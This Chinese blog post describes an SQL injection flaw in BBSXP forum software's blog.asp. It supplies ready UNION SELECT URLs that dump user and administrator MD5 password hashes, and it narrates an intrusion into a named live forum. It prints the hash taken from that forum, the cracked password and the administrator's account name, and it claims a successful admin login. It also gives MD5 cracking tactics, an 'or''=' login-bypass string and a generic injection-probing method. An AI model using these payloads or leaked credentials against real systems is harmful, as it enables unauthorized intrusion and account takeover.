BBSXP最新漏洞

漏洞日期:2005年7月1日
受害版本号:眼下全部BBSXP
漏洞利用:
查前台password注入语句:
blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5
查后台password注入语句:
blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5

首先打开www.google.com在输入Po......bBsxp5.15有非常多这种论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀究竟,bbsxp5.15最新漏洞 
漏洞主要出在BLOG.ASP 能够让直接构造数据库命令  
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
后台区长的md5password就显示出来了。 
前台password也能够出来, 
网上已经有相关动画,软件。 
就利用这个漏洞,肯定有一批bbsxp的站点要倒下了 
接下来就是讲工具了,准备好MD5password破解器 
关于md5的破解,比較好使的有md5cracker速度增强版。 
1。先用8位或9位数字跑。非常快。 
2。假设不行,用小写字母跑。选择5-6位比較好。 
3。再不行,说明password可能使字母加数字,能够碰碰运气。能够配置一个精品自典,比方10G的, 
   跑上及几个小时。(你的机器配置必须非常好) 
4。再不行,建议放弃,太变态了。 
前台ok...后台password..(注:你必须知道管理员的帐号) 
直接默认的配置就是直接拿下后台password... 
直接吧前台md5password暴出来。 
剩下的事就事破解md5了。 
如今開始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
他的password是7CB2BE65EB9F215215A0725A10B6E39E可能前台的password和后台一样,假设有2个加密password那就是代表1个是前台的一个是后台的,不多说了,看操作 
依照上面工具的介绍先用数字把, 
正在破===耐心等等 
我接条信息,大家不介意把~ 
出来了,password是82246124,登入,,他的帐号是wzwu,password82246124,登入成功,后台登入,password82246124,登入成功,以下的因该知道把,我也就不多说了,以免遭到人家的痛骂。 
bBsxp5.15最新漏洞的原始作者不清

74D2710BD75C06A057E842C8CA55C576

名'or''='password也是'or''='
 '
一般ASP系统都有相似以下的URL:http://www.xxx.com/xxx.ASP?ID=××,我们仅仅往在这种URL后加上一个单引號,假设返回server错误信息,那么就说明了程序并没有过滤单引號,并且从返回的错误信息中的了能够得到server的一些相关配置信息。接着接交http:/www.xxx.com/xxx.asp?id=××
      and 1=1、http:/www.xxx.com/xx.asp?id=×× and
      1=2,假设返回的页面不一样,说明页面能够注入。

最新文章

  1. HTML学习
  2. JavaScript(js)的replace问题的解决
  3. spinner下拉框组件
  4. 阿里公共DNS 正式发布了
  5. Http权威指南(一)---读书笔记
  6. 第二百零八天 how can I 坚持
  7. 【tyvj1952】easy
  8. SQL Server数据库同步SQL
  9. VMware vSphere 服务器虚拟化之十七 桌面虚拟化之安装View链接服务器
  10. CNTV视频回看下载地址
  11. C# WinForm DataGridView让DataPropertyName支持复杂属性
  12. linkin大话设计模式--策略模式
  13. MongoDB系列四(索引).
  14. Pandas学习笔记
  15. npm 发布包(publish)
  16. RocketMQ 概述
  17. sencha touch 评分扩展
  18. bat批量重命名文件
  19. 如何固定OpenERP顶的主菜单,方便滚动至第二屏以及多屏时,快速切换主菜单
  20. [译]C语言实现一个简易的Hash table(3)

热门文章

  1. 反编译.net dll
  2. Jquery动画第二部分
  3. vijosp1507郁闷的出纳员
  4. 关于SqlParameter中IN子句查询的问题
  5. HHVM 是如何提升 PHP 性能的?
  6. CPU affinity 进程和线程的亲缘性
  7. 如何升级cordova插件
  8. NGINX(一)内存结构
  9. Bzoj4556: [Tjoi2016&Heoi2016]字符串 后缀数组
  10. Ubuntu安装JDK1.6